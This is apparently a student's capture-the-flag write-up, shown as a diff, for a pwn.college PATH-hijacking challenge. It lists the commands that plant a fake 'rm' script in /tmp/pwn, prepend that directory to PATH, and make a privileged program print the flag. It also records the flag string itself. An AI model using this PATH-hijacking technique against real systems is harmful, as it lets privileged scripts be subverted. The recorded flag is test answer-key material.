cipher-muse777/pwn.college_altia/14 Pondering PATH.md

 # Hijacking Commands

 **FLAG:** pwn.college{0Xy2LTJnWLo0wgDt3gOCbnnz3Go.QX3cjM1wCMyAzNzEzW}
-i first created a directory using mkdir /tmp/pwn then i echo '#!/bin/bash' > /tmp/pwn/rm to make a fake command script with shebang and then used chmod a+x /tmp/pwn/rm to give permissions
-PATH="/tmp/pwn:$PATH" THEN FINALLY ran /challenge/run to obtain the flag
+i first created a directory using mkdir /tmp/pwn then i echo '#!/bin/bash' > /tmp/pwn/rm to make a fake command script with shebang and then used chmod a+x /tmp/pwn/rm to give permissions and then echo 'cat -- "$@"' >> /tmp/pwn/rm and then PATH="/tmp/pwn:$PATH" THEN FINALLY ran /challenge/run to obtain the flag.

+### What i learned
+how we can use echo '#!/bin/bash' > /tmp/pwn/rm to make a fake command script and how  echo 'cat -- "$@"' >> /tmp/pwn/rm safely reads and outputs the contents of all arguments passed to the script, treating each as a literal filename

+### REFERENCES
+copilot guided me through the steps when i got stuck